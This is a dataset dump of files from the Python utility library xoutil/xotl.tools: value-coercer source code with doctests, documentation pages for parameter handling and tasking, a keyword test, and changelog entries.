Any other value is considered invalid\n and raises an exception.\n\n :param join: When a collection is used; if this argument is None a\n collection of names is returned, if not None then is used to join\n the items in a resulting string.\n\n For example::\n\n >>> coercer_name((int_coerce, float_coerce))\n ('int', 'float')\n\n >>> coercer_name((int_coerce, float_coerce), join='-')\n 'int-float'\n\n To obtain pretty-print tuples, use something like::\n\n >>> coercer_name((int_coerce, float_coerce),\n ... join=lambda arg: '(%s)' % ', '.join(arg))\n\n This function not only works with coercers, all objects that fulfill\n needed protocol to get names will also be valid.\n\n \"\"\"\n # TODO: Maybe this function must be moved to `xotl.tools.names`\n if isinstance(arg, (tuple, list, set)):\n res = type(arg)(coercer_name(c) for c in arg)\n if isinstance(join, str):\n join = join.join\n return str(join(res)) if join else res\n else:\n try:\n res = arg.__name__\n except Exception:\n res = str(arg)\n suffix = str(\"_coerce\")\n if res.endswith(suffix):\n res = res[: -len(suffix)]\n return res\n\n\n@coercer\ndef identity_coerce(arg):\n \"Leaves unchanged the passed argument `arg`.\"\n return arg\n\n\n@coercer\ndef void_coerce(arg):\n \"\"\"Always `nil`.\"\"\"\n return nil\n\n\n@coercer\ndef type_coerce(arg):\n \"\"\"Check if `arg` is a valid type.\"\"\"\n return arg if isinstance(arg, type) else nil\n\n\n@coercer\ndef types_tuple_coerce(arg):\n \"\"\"Check if `arg` is valid for `isinstance` or `issubclass` 2nd argument.\n\n Type checkers are any class, a type or tuple of types. 
For example::\n\n >>> types_tuple_coerce(object) == (object,)\n True\n\n >>> types_tuple_coerce((int, float)) == (int, float)\n true\n\n >>> types_tuple_coerce('not-a-type') is nil\n True\n\n See `type_coerce` for more information.\n\n \"\"\"\n if t(type_coerce(arg)):\n return (arg,)\n elif isinstance(arg, tuple) and all(t(type_coerce(tp)) for tp in arg):\n return arg\n else:\n return nil\n\n\n@coercer\ndef callable_coerce(arg):\n \"\"\"Check if `arg` is a callable object.\"\"\"\n return arg if callable(arg) else nil\n\n\n@coercer\ndef file_coerce(arg):\n \"\"\"Check if `arg` is a file-like object.\"\"\"\n from io import IOBase\n\n METHODS = (\"close\", \"write\", \"read\")\n ok = isinstance(arg, IOBase) or all(hasattr(arg, a) for a in METHODS)\n return arg if ok else nil\n\n\n@coercer\ndef float_coerce(arg):\n \"\"\"Check if `arg` is a valid float.\n\n Other types are checked (string, int, complex).\n\n \"\"\"\n if isinstance(arg, float):\n return arg\n elif isinstance(arg, int):\n return float(arg)\n elif isinstance(arg, (str, bytes)):\n try:\n return float(arg)\n except ValueError:\n return nil\n elif isinstance(arg, complex):\n return arg.real if arg.imag == 0 else nil\n else:\n return nil\n\n\n@coercer\ndef int_coerce(arg):\n \"\"\"Check if `arg` is a valid integer.\n\n Other types are checked (string, float, complex).\n\n \"\"\"\n if isinstance(arg, int):\n return arg\n else:\n arg = float_coerce(arg)\n if t(arg):\n res = int(arg)\n return res if arg - res == 0 else nil\n else:\n return nil\n\n\n@coercer\ndef number_coerce(arg):\n \"\"\"Check if `arg` is a valid number (integer or float).\n\n Types that are checked (string, int, float, complex).\n\n \"\"\"\n if isinstance(arg, int):\n return arg\n else:\n f = float_coerce(arg)\n if t(f):\n i = int(f)\n return i if f - i == 0 else f\n else:\n return nil\n\n\n@coercer\ndef positive_int_coerce(arg):\n \"\"\"Check if `arg` is a valid positive integer.\"\"\"\n res = int_coerce(arg)\n return res if res is nil or 
res >= 0 else nil\n\n\ndef create_int_range_coerce(min, max):\n \"\"\"Create a coercer to check integers between a range.\"\"\"\n min, max = vouch(int_coerce, min), vouch(int_coerce, max)\n if min < max:\n\n @coercer\n def inner(arg):\n 'Check if `arg` is a valid integer between \"{}\" and \"{}\".'\n arg = int_coerce(arg)\n if t(arg) and min <= arg <= max:\n return arg\n else:\n return nil\n\n inner.__name__ = str(\"int_between_{}_and_{}_coerce\".format(min, max))\n inner.__doc__ = inner.__doc__.format(min, max)\n return inner\n else:\n msg = '\"{}\" must be less than or equal \"{}\"'\n raise ValueError(msg.format(min, max))\n\n\n# Identifiers and strings\n\n# TODO: In Py3k \"ña\" is a valid identifier and this regex won't allow it\n_IDENTIFIER_REGEX = re.compile(r\"(?i)^[_a-z][\\w]*$\")\n\n\n# XXX: 'eight' pending.\n@coercer\ndef identifier_coerce(arg):\n \"\"\"Check if `arg` is a valid Python identifier.\n\n .. note:: Only Python 2's version of valid identifier. This means that\n some Python 3 valid identifiers are not considered valid. 
This\n helps to keep things working the same in Python 2 and 3.\n\n \"\"\"\n ok = isinstance(arg, str) and _IDENTIFIER_REGEX.match(arg)\n return str(arg) if ok else nil\n\n\n_FULL_IDENTIFIER_REGEX = re.compile(r\"(?i)^[_a-z][\\w]*([.][_a-z][\\w]*)*$\")\n\n\n@coercer\ndef full_identifier_coerce(arg):\n \"\"\"Check if `arg` is a valid dotted Python identifier.\n\n See `identifier_coerce`:func: for what \"validity\" means.\n\n \"\"\"\n ok = isinstance(arg, str) and _FULL_IDENTIFIER_REGEX.match(arg)\n return str(arg) if ok else nil\n\n\n@coercer\ndef names_coerce(arg):\n \"\"\"Check `arg` as a tuple of valid object names (identifiers).\n\n If only one string is given, is returned as the only member of the\n resulting tuple.\n\n \"\"\"\n arg = (arg,) if isinstance(arg, str) else tuple(arg)\n return iterable(identifier_coerce)(arg)\n\n\n# == Iterators ==\n\n\ndef create_unique_member_coerce(coerce, container):\n \"\"\"Useful to wrap member coercers when coercing containers.\n\n See `iterable`:class: and `mapping`:class:.\n\n Resulting coercer check that a member must be unique (not repeated) after\n it's coerced.\n\n For example::\n\n >>> from xotl.tools.values import (mapping, create_unique_member_coerce,\n ... 
int_coerce, float_coerce)\n\n >>> sample = {'1': 1, 2.0: '3', 1.0 + 0j: '4.1'}\n\n >>> dc = mapping(int_coerce, float_coerce)\n >>> dc(dict(sample))\n {1: 1.0, 2: 3.0}\n\n >>> dc = mapping(create_unique_member_coerce(int_coerce), float_coerce)\n >>> dc(dict(sample))\n nil\n\n \"\"\"\n coerce = vouch(coercer, coerce)\n\n @coercer\n def inner(arg):\n \"\"\"Check a member with \"{}\" coercer and warrant that is unique.\"\"\"\n # assert arg in container\n res = coerce(arg)\n if t(res) and hash(res) != hash(arg) and res in container:\n res = nil\n return res\n\n cname = coercer_name(coerce)\n inner.__name__ = str(\"unique_member_{}_coerce\".format(cname))\n inner.__doc__ = inner.__doc__.format(cname)\n return inner\n\n\n@coercer\ndef sized_coerce(arg):\n \"\"\"Return a valid sized iterable from `arg`.\n\n If `arg` is iterable but not sized, is converted to a list. For example::\n\n >>> sized_coerce(i for i in range(1, 10, 2))\n [1, 3, 5, 7, 9]\n\n >>> s = {1, 2, 3}\n >>> sized_coerce(s) is s\n True\n\n \"\"\"\n from collections import Iterable, Sized\n\n if isinstance(arg, Iterable):\n return arg if isinstance(arg, Sized) else list(arg)\n else:\n return nil\n\n\[email protected]\nclass custom:\n \"\"\"Base class for any custom coercer.\n\n The field `inner` stores an internal data used for the custom coercer;\n could be a callable, an inner coercer, or a tuple of inner checkers if\n more than one is needed, ...\n\n The field `scope` stores the exit (not regular) condition: the value that\n fails or -if needed- a tuple with (exit-value, exit-coercer) or\n (error-value, error). The exit condition is not always a failure, for\n example in `some`:class: it is the one that is valid among other inner\n coercers. 
To understand better this think on (AND, OR) operators a chain\n of ANDs exits with the first failure and a chains of ORs exits with the\n first success.\n\n All custom coercers are callable (must redefine `__call__`:meth:)\n receiving one argument that must be coerced. For example::\n\n >>> def foobar(*args):\n ... coerce = pargs(int_coerce)\n ... return coerce(args)\n\n This class has two protected fields (`_str_join` and `_repr_join`) that\n are used to call `coercer_name`:func: in `__str__`:meth: and\n `__repr__`:meth: special methods.\n\n \"\"\"\n\n __slots__ = (\"inner\", \"scope\")\n\n _str_join = \"_\"\n _repr_join = \", \"\n\n def __init__(self, *args, **kwargs):\n # This constructor is a placeholder for those custom coercers that can\n # return an instance of a different type in the `__new__`:meth:.\n self.scope = Unset\n\n def __str__(self):\n name = coercer_name(self.inner, join=self._str_join)\n cls_name = type(self).__name__\n return str(\"{}_{}_coerce\".format(name, cls_name))\n\n def __repr__(self):\n name = coercer_name(self.inner, join=self._repr_join)\n cls_name = type(self).__name__\n return str(\"{}({})\".format(cls_name, name))\n\n def __call__(self, arg):\n return nil\n\n @classmethod\n def flatten(cls, obj, avoid=Unset):\n \"\"\"Flatten a coercer set.\n\n :param obj: Could be a coercer representing other inner coercers, or a\n tuple or list containing coercers.\n\n \"\"\"\n aux = obj.inner if isinstance(obj, cls) else obj\n if isinstance(aux, (tuple, list)):\n if not types_tuple_coerce(aux):\n res = (i for l in map(cls.flatten, aux) for i in l)\n else:\n res = (coercer(aux),)\n else:\n res = (aux,)\n if avoid is not Unset:\n res = (i for i in res if i is not avoid)\n return tuple(res)\n\n\nclass istype(custom):\n \"\"\"Pure type-checker.\n\n It's constructed from an argument valid for `types_tuple_coerce`:func:\n coercer.\n\n For example::\n\n >>> int_coerce = istype(int)\n\n >>> int_coerce(1)\n 1\n\n >>> int_coerce('1')\n nil\n\n >>> 
number_coerce = istype((int, float, complex))\n\n >>> number_coerce(1.25)\n 1.25\n\n >>> number_coerce('1.25')\n nil\n\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, types):\n if types:\n self = super().__new__(cls)\n self.inner = vouch(types_tuple_coerce, types)\n return self\n else:\n return void_coerce\n\n def __call__(self, arg):\n return arg if isinstance(arg, self.inner) else nil\n\n\nclass typecast(istype):\n \"\"\"A type-caster.\n\n It's constructed from an argument valid for `types_tuple_coerce`:func:\n coercer. Similar to `istype`:class: but try to convert the value if\n needed.\n\n For example::\n\n >>> int_cast = typecast(int)\n\n >>> int_cast('1')\n 1\n\n >>> int_cast('1x')\n nil\n\n \"\"\"\n\n __slots__ = ()\n\n def __call__(self, arg):\n res = super().__call__(arg)\n i = 0\n while not t(res) and i < len(self.inner):\n try:\n tp = self.inner[i]\n res = tp(arg)\n self.scope = tp\n except Exception:\n i += 1\n return res\n\n\nclass safe(custom):\n \"\"\"Uses a function (or callable) in a safe way.\n\n Receives a coercer that expects only one argument and returns another\n value.\n\n If the returned value is a ``boolean`` (maybe the coercer is a predicate),\n it's converted to a ``logical`` instance.\n\n The wrapped coercer is called in a safe way (inside try/except); if an\n exception is raised the coercer returns ``nil`` and the error is saved in\n the instance attribute ``scope``.\n\n \"\"\"\n\n __slots__ = ()\n\n def __init__(self, func):\n super().__init__()\n self.inner = vouch(coercer, func)\n\n def __call__(self, arg):\n try:\n from xotl.tools.symbol import boolean\n\n res = self.inner(arg)\n return logical(res) if isinstance(res, boolean) else res\n except Exception as error:\n self.scope = (arg, error)\n return nil\n\n\nclass compose(custom):\n \"\"\"Returns the composition of several inner `coercers`.\n\n ``compose(f1, ... 
fn)`` is equivalent to f1(...(fn(arg))...)``.\n\n If no coercer is given return `identity_coerce`:func:.\n\n Could be considered an \"AND\" operator with some light differences because\n the nature of coercers: ordering the coercers is important when some can\n modify (adapt) original values.\n\n If no value results in `coercers`, a default coercer could be given as a\n keyword argument; `identity_coerce` is assumed if missing.\n\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, *coercers, **kwds):\n inner = cls.flatten(coercers, avoid=identity_coerce)\n count = len(inner)\n if count > 1:\n self = super().__new__(cls)\n self.inner = inner\n return self\n elif count == 1:\n return inner[0]\n else:\n res = kwds.pop(\"default\", identity_coerce)\n if not kwds:\n return res\n else:\n msg = '`compose` got unexpected keyword argument(s) \"{}\"'\n raise TypeError(msg.format(set(kwds)))\n\n def __call__(self, arg):\n coercers = self.inner\n i = 0\n res = arg\n ok = True\n while ok and i < len(coercers):\n coerce = coercers[i]\n aux = coerce(res)\n if t(aux):\n i += 1\n else:\n ok = False\n self.scope = (res, coerce)\n res = aux\n return res\n\n\nclass some(custom):\n \"\"\"Represent OR composition of several inner `coercers`.\n\n ``compose(f1, ... fn)`` is equivalent to f1(arg) or f2(arg) ... 
fn(arg)``\n in the sense \"the first not `nil`\".\n\n If no coercer is given return `void_coerce`:func:.\n\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, *coercers):\n inner = cls.flatten(coercers, avoid=void_coerce)\n if len(inner) > 1:\n self = super().__new__(cls)\n self.inner = inner\n return self\n elif len(inner) == 1:\n return inner[0]\n else:\n return void_coerce\n\n def __call__(self, arg):\n coercers = self.inner\n i = 0\n res = nil\n while res is nil and i < len(coercers):\n coercer = coercers[i]\n value = coercer(arg)\n if t(value):\n res = value\n self.scope = coercer\n else:\n i += 1\n return res\n\n\nclass combo(custom):\n \"\"\"Represent a zip composition of several inner `coercers`.\n\n An instance of this class is constructed from a sequence of coercers and\n the its purpose is coerce a sequence of values. Return a sequence\\\n [#type]_ where each item contains the i-th element from applying the i-th\n coercer to the i-th value from argument sequence::\n\n coercers -> (coercer-1, coercer-2, ... )\n values -> (value-1, value-2, ... )\n combo(coercers)(values) -> (coercer-1(value-1), coercer-2(value-2), ...)\n\n If any value is coerced invalid, the function returns `nil` and the\n combo's instance variable `scope` receives the duple ``(failed-value,\n failed-coercer)``.\n\n The returned sequence is truncated in length to the length of the shortest\n sequence (coercers or arguments).\n\n If no coercer is given, all sequences are coerced as empty.\n\n .. 
[#type] The returned sequence is of the same type as the argument\n sequence if possible.\n\n \"\"\"\n\n __slots__ = ()\n\n def __init__(self, *coercers):\n super().__init__()\n coercers = pargs(coercer)(coercers)\n self.inner = tuple(vouch(coercer, c) for c in coercers)\n\n def __call__(self, arg):\n from collections import Iterable\n\n if isinstance(arg, Iterable):\n coercers = self.inner\n items = iter(arg)\n i = 0\n res = []\n ok = True\n while t(res) and ok and i < len(coercers):\n item = next(items, Unset)\n if item is not Unset:\n coerce = coercers[i]\n value = coerce(item)\n if t(value):\n res.append(value)\n i += 1\n else:\n res = nil\n self.scope = (item, coerce)\n else:\n ok = False\n if t(res):\n try:\n res = type(arg)(res)\n except Exception:\n pass\n else:\n res = nil\n return res\n\n\nclass pargs(custom):\n r\"\"\"Create a inner coercer that check variable argument passing.\n\n Created coercer closure must always receives an argument that is an valid\n iterable with all members coerced properly with the argument of this outer\n creator function.\n\n If the inner closure argument has only a member and this one is not\n properly coerced but it's an iterabled with all members that coerced well,\n this member will be the assumed iterable instead the original argument.\n\n In the following example::\n\n >>> from xotl.tools.values import (iterable, int_coerce)\n\n >>> def foobar(*args):\n ... coerce = iterable(int_coerce)\n ... return coerce(args)\n\n >>> args = (1, 2.0, '3.0')\n >>> foobar(*args)\n (1, 2, 3)\n\n >>> foobar(args)\n nil\n\n An example using `pargs`:class:\\ ::\n\n >>> from xotl.tools.values import (pargs, int_coerce)\n\n >>> def foobar(*args):\n ... # Below, \"coercer\" receives the returned \"inner\"\n ... coerce = pargs(int_coerce)\n ... 
return coerce(args)\n\n >>> args = (1, 2.0, '3.0')\n >>> foobar(*args)\n (1, 2, 3)\n\n >>> foobar(args)\n (1, 2, 3)\n\n The second form is an example of the real utility of this coercer\n closure: if by error a sequence is passed as it to a function that\n expect a variable number of argument, this coercer fixes it.\n\n Instance variable `scope` stores the last processed invalid argument.\n\n When executed, usually `arg` is a tuple received by a function as\n ``*args`` form.\n\n When executed, returns a tuple, or the same type of source iterable\n argument if possible.\n\n See `xotl.tools.params`:mod: for a more specialized and full function\n arguments conformer.\n\n See `combo`:class: for a combined coercer that validate each member with\n a separate member coercer.\n\n \"\"\"\n __slots__ = ()\n\n def __init__(self, arg_coerce):\n super().__init__()\n self.inner = vouch(coercer, arg_coerce)\n\n def __call__(self, arg):\n from collections import Iterable\n\n coerce = self.inner\n if isinstance(arg, Iterable):\n arg = tuple(arg)\n if len(arg) == 1:\n item = arg[0]\n aux = coerce(item)\n if t(aux):\n res = (aux,)\n elif isinstance(item, Iterable):\n res = Unset\n arg = tuple(item)\n else:\n self.scope = item\n res = nil\n else:\n res = Unset\n if res is Unset:\n res = arg\n i = 0\n while t(res) and i < len(res):\n item = res[i]\n new = coerce(item)\n if t(new):\n if new is not item:\n if isinstance(res, tuple):\n res = list(res)\n res[i] = new\n i += 1\n else:\n self.scope = item\n res = nil\n if t(res):\n res = tuple(res)\n else:\n res = nil\n return res\n\n\nclass iterable(custom):\n \"\"\"Create a inner coercer that coerces an `iterable` member a member.\n\n See constructor for more information.\n\n Return a list, or the same type of source iterable argument if possible.\n\n For example::\n\n >>> from xotl.tools.values import (iterable, int_coerce,\n ... 
create_unique_member_coerce)\n\n >>> sample = {'1', 1, '1.0'}\n\n >>> sc = iterable(int_coerce)\n >>> sc(set(sample)) == {1}\n True\n\n See `mapping`:class: for more details of this problem. The equivalent\n safe example is::\n\n >>> member_coerce = create_unique_member_coerce(int_coerce, sample)\n >>> sc = iterable(member_coerce)\n >>> sc(set(sample))\n nil\n\n when executed coerces `arg` (an iterable) member a member using\n `member_coercer`. If any member coercion fails, the full execution also\n fails.\n\n There are three types of results when an instance is executed:\n (1) iterables that are coerced without modifications, (2) the modified\n ones but conserving its type, and (3) those that are returned in a list.\n\n \"\"\"\n\n __slots__ = ()\n\n def __init__(self, member_coerce, outer_coerce=True):\n \"\"\"Constructor for `iterable`:class: coercers.\n\n :param member_coerce: A coerce to check each iterable member.\n\n :param outer_coerce: A coerce to check the type of the entire\n iterable. 
Normally a type or tuple of types subclases of\n ``collections.Iterable``.\n\n \"\"\"\n super().__init__()\n member_coerce = vouch(coercer, member_coerce)\n outer_coerce = compose(coercer(outer_coerce), sized_coerce)\n self.inner = (member_coerce, outer_coerce)\n\n def __call__(self, arg):\n from collections import Set, Sequence, MutableSequence\n\n member_coerce, outer_coerce = self.inner\n modified = False\n aux = outer_coerce(arg)\n if t(aux):\n arg = aux\n if isinstance(arg, Sequence):\n res = arg\n retyped = False\n mutable = isinstance(arg, MutableSequence)\n else:\n res = list(arg)\n retyped = mutable = True\n i = 0\n while t(res) and i < len(res):\n item = res[i]\n new = member_coerce(item)\n if t(new):\n if new is not item:\n if not mutable:\n res = list(res)\n retyped = mutable = True\n res[i] = new\n modified = True\n i += 1\n else:\n self.scope = item\n res = nil\n if t(res):\n if isinstance(arg, Set) and not modified:\n res = arg\n elif retyped:\n try:\n res = type(arg)(res)\n except Exception:\n pass\n else:\n self.scope = arg\n res = nil\n return res\n\n\nclass mapping(custom):\n \"\"\"Create a coercer to check dictionaries.\n\n Receives two coercers, one for keys and one for values.\n\n For example::\n\n >>> from xotl.tools.values import (mapping, int_coerce, float_coerce,\n ... create_unique_member_coerce)\n\n >>> sample = {'1': 1, 2.0: '3', 1.0 + 0j: '4.1'}\n\n >>> dc = mapping(int_coerce, float_coerce)\n >>> dc(dict(sample)) == {1: 1.0, 2: 3.0}\n True\n\n When coercing containers it's probable that members become repeated after\n coercing them. This could be not desirable (mainly in sets and\n dictionaries). In those cases use `create_unique_member_coerce`:func: to\n wrap member coercer. 
For example::\n\n >>> key_coerce = create_unique_member_coerce(int_coerce, sample)\n >>> dc = mapping(key_coerce, float_coerce)\n >>> dc(dict(sample))\n nil\n\n Above problem is because it's the same integer (same hash) coerced\n versions of ``'1'`` and ``1.0+0j``.\n\n This problem of objects of different types that have the same hash is a\n problem to use a example as below::\n\n >>> {1: int, 1.0: float, 1+0j: complex} == {1: complex}\n True\n\n \"\"\"\n\n __slots__ = ()\n _str_join = _repr_join = \":\"\n\n def __new__(cls, key_coercer=Unset, value_coercer=Unset):\n \"\"\"Constructor for `mapping`:class: coercers.\n\n :param key_coercer: A coerce to check each one of the mapping keys.\n\n :param value_coercer: A coerce to check each one of corresponding\n mapping values.\n\n \"\"\"\n from collections import Mapping\n\n if key_coercer is value_coercer is Unset:\n return coercer(Mapping)\n else:\n self = super().__new__(cls)\n key_coercer = vouch(coercer, key_coercer or True)\n value_coercer = vouch(coercer, value_coercer or True)\n self.inner = (key_coercer, value_coercer)\n return self\n\n def __call__(self, arg):\n from collections import Mapping, MutableMapping\n\n if isinstance(arg, Mapping):\n key_coercer, value_coercer = self.inner\n res = arg\n retyped = False\n mutable = isinstance(arg, MutableMapping)\n keys = list(res)\n i = 0\n while t(res) and i < len(keys):\n key = keys[i]\n value = res[key]\n new_key = key_coercer(key)\n if t(new_key):\n new_value = value_coercer(value)\n if t(new_value):\n if new_key is not key or new_value is not value:\n if not mutable:\n res = dict(res)\n retyped = mutable = True\n if key is not new_key:\n del res[key]\n res[new_key] = new_value\n i += 1\n else:\n self.scope = ({key: value}, value_coercer)\n res = nil\n else:\n self.scope = ({key: value}, key_coercer)\n res = nil\n if t(res) and retyped:\n try:\n res = type(arg)(res)\n except Exception:\n pass\n else:\n self.scope = ()\n res = nil\n return res\n\n\ndel re, 
ABCMeta, lwraps\n" }, { "alpha_fraction": 0.5496063232421875, "alphanum_fraction": 0.5788976550102234, "avg_line_length": 29.528846740722656, "blob_id": "c3c40da42f8876a444ca55954225f2ac8bad9c13", "content_id": "7fef612f0170868b3e670773e56c87133254fd8f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3175, "license_type": "permissive", "max_line_length": 80, "num_lines": 104, "path": "/docs/source/xotl.tools/params.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "===================================================================\n `xotl.tools.params`:mod: -- Tools for managing function arguments\n===================================================================\n\n.. automodule:: xotl.tools.params\n\n\nExamples\n========\n\nIn next example, the parameter key-named \"stream\" could be also passed as name\n\"output\", must be a file, default value is ``stdout``, and if passed as\npositional, could be the first or the last one.\n\n\n >>> import sys\n >>> from xotl.tools.values import file_coerce as is_file\n >>> from xotl.tools.values import positive_int_coerce as positive_int\n >>> from xotl.tools.params import ParamScheme as scheme, ParamSchemeRow as row\n\n >>> sample_scheme = scheme(\n ... row('stream', 0, -1, 'output', default=sys.stdout, coerce=is_file),\n ... row('indent', 0, 1, default=1, coerce=positive_int),\n ... row('width', 0, 1, 2, 'max_width', default=79, coerce=positive_int),\n ... row('newline', default='\\n', coerce=(str, )))\n\n\nSome tests::\n\n >>> def test(*args, **kwargs):\n ... 
return sample_scheme(args, kwargs)\n\n >>> test(4, 80)\n {'indent': 4,\n 'newline': '\\n',\n 'stream': <open file '<stdout>', mode 'w' at 0x7f927b32b150>,\n 'width': 80}\n\n >>> test(2, '80') # Because positive int coercer use valid string values\n {'indent': 2,\n 'newline': '\\n',\n 'stream': <open file '<stdout>', mode 'w' at 0x7f927b32b150>,\n 'width': 80}\n\n >>> test(sys.stderr, 4, 80)\n {'indent': 4,\n 'newline': '\\n',\n 'stream': <open file '<stderr>', mode 'w' at 0x7f927b32b1e0>,\n 'width': 80}\n\n >>> test(4, sys.stderr, newline='\\n\\r')\n {'indent': 4,\n 'newline': '\\n\\r',\n 'stream': <open file '<stderr>', mode 'w' at 0x7f927b32b1e0>,\n 'width': 79}\n\n >>> sample_scheme((4, 80), {'extra': 'extra param'}, strict=False)\n {'extra': 'extra param',\n 'indent': 4,\n 'newline': '\\n',\n 'stream': <open file '<stdout>', mode 'w' at 0x7f3c6815c150>,\n 'width': 80}\n\nAnother way of use this is through a `ParamManager`:class: instance, using the\nactual arguments of a function to create it::\n\n >>> def slugify(value, *args, **kwds):\n ... from xotl.tools.params import ParamManager\n ... getarg = ParamManager(args, kwds)\n ... replacement = getarg('replacement', 0, default='-',\n ... coercers=(str, ))\n ... invalid_chars = getarg('invalid_chars', 'invalid', 'invalids', 0,\n ... default='', coercers=_ascii)\n ... valid_chars = getarg('valid_chars', 'valid', 'valids', 0,\n ... default='', coercers=_ascii)\n ... # And so on.\n\nNotice that each call has the same protocol than a parameter definition row\n(see `ParamSchemeRow`:class:).\n\n\nModule Members\n==============\n\n.. autofunction:: issue_9137\n\n.. autofunction:: check_count\n\n.. autofunction:: check_default\n\n.. autofunction:: single\n\n.. autofunction:: pop_keyword_arg\n\n.. autofunction:: pop_keyword_values\n\n.. autoclass:: ParamManager\n :members: __init__, __call__, remainder\n\n.. autoclass:: ParamScheme\n :members: defaults, __call__, __len__, __getitem__, __iter__\n\n.. 
autoclass:: ParamSchemeRow\n :members: key, default, __call__\n" }, { "alpha_fraction": 0.5611164569854736, "alphanum_fraction": 0.5649663209915161, "avg_line_length": 31.46875, "blob_id": "dd9d43cfb23f362e0dac1f0efbdc31bfe38c5d99", "content_id": "acc7667f7084dca4d5e6480792cbe3317354514c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1040, "license_type": "no_license", "max_line_length": 75, "num_lines": 32, "path": "/tests/test_keywords.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\nfrom xoutil.keywords import getkwd, setkwd, kwd_getter, kwd_setter, org_kwd\n\n\ndef test_keywords():\n class Foobar:\n pass\n\n proper = lambda v: isinstance(v, type) and issubclass(v, Foobar)\n obj = Foobar()\n names = {\"if\", \"and\", \"or\", \"abc\", \"xyz\"}\n for name in names:\n setkwd(obj, name, type(name.title(), (Foobar,), {}))\n for name, value in vars(obj).items():\n if proper(value):\n assert org_kwd(name).title() == value.__name__\n kwd_setter(obj)(\"else\", 123)\n assert obj.if_ is kwd_getter(obj)(\"if\")\n assert obj.and_ is getkwd(obj, \"and\")\n assert obj.xyz is getkwd(obj, \"xyz\")\n assert obj.else_ is getkwd(obj, \"else\")\n keys = {org_kwd(n) for n, v in vars(obj).items() if proper(v)}\n assert keys == names\n" }, { "alpha_fraction": 0.7228260636329651, "alphanum_fraction": 0.7264492511749268, "avg_line_length": 41.46154022216797, "blob_id": "d6db344a07745d5ae41650714904d2856695d887", "content_id": "0f67c78ddab1479ff7a0cbda8880ae540c154743", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": 
"reStructuredText", "length_bytes": 552, "license_type": "permissive", "max_line_length": 77, "num_lines": 13, "path": "/docs/source/history/_changes-1.5.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Deprecated function `xoutil.objects.get_and_del_key`:func:. Use the\n `dict.pop`:meth: directly.\n\n To have consistent naming, renamed `~xoutil.objects.get_and_del_attr`:func:\n and `~xoutil.objects.get_and_del_first_of`:func: to\n `~xoutil.objects.popattr`:func: and `~xoutil.objects.pop_first_of`:func:.\n Old names are left as deprecated aliases.\n\n- Now `xoutil.functools.update_wrapper`:func:, `xoutil.functools.wraps`:func:\n and `xoutil.functools.lru_cache`:func: are Python 3.3 backports (or\n aliases).\n\n- New module `xoutil.textwrap`:mod:.\n" }, { "alpha_fraction": 0.6276595592498779, "alphanum_fraction": 0.6289893388748169, "avg_line_length": 29.079999923706055, "blob_id": "c6a5df7bc46a28cb74a8ff3250c21e8064ea9f58", "content_id": "a3368d560a1beb5db525c7668ab7e9787cfdb36a", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 752, "license_type": "permissive", "max_line_length": 130, "num_lines": 25, "path": "/docs/source/xotl.tools/tasking.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "===================================================\n :mod:`xotl.tools.tasking` -- Task oriented tools.\n===================================================\n\n.. automodule:: xotl.tools.tasking\n\n\n.. autoclass:: retrier(max_tries=None, max_time=None, wait=DEFAULT_WAIT_INTERVAL, retry_only=None)\n :members: decorate\n\n.. autofunction:: retry(fn, args=None, kwargs=None, *, max_tries=None, max_time=None, wait=DEFAULT_WAIT_INTERVAL, retry_only=None)\n\n.. autoclass:: ConstantWait(wait=DEFAULT_WAIT_INTERVAL)\n\n.. autoclass:: BackoffWait(wait=DEFAULT_WAIT_INTERVAL, backoff=1)\n\n.. 
autodata:: MIN_WAIT_INTERVAL\n\n.. autodata:: DEFAULT_WAIT_INTERVAL\n\n.. class:: StandardWait\n\n A deprecated alias for `ConstantAlias`:class:.\n\n.. autofunction:: get_backoff_wait\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 24, "blob_id": "8fd517b1e44994c4fb9d424bd7a1cef6eb935785", "content_id": "4e3a470acbd5e98bcdc22c7b6d0510692558b4e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24, "license_type": "no_license", "max_line_length": 24, "num_lines": 1, "path": "/xoutil/release.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "../xotl/tools/release.py" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.753125011920929, "avg_line_length": 44.71428680419922, "blob_id": "292ccc2dc74880500399b4e027538321703739ae", "content_id": "db34242397e467c06878d9fe818cce475c756f17", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 320, "license_type": "permissive", "max_line_length": 76, "num_lines": 7, "path": "/docs/source/history/_changes-1.9.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix `xoutil.eight.iteritems`:func:, `xoutil.eight.itervalues`:func: and\n `xoutil.eight.iterkeys`:func: to return an iterator.\n\n- `~xoutil.validators.identifiers.is_valid_identifier`:func: so that it uses\n `str.isidentifier`:meth: in Python 3.\n\n- Add class method `xoutil.future.collections.opendict.from_enum`:meth:\n" }, { "alpha_fraction": 0.7583892345428467, "alphanum_fraction": 0.7583892345428467, "avg_line_length": 36.25, "blob_id": "e43930bbc04045c4bc0104242b5265d275c1815a", "content_id": "34a81bd6fe09fc030c2f12bdf69e6f619d2048df", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], 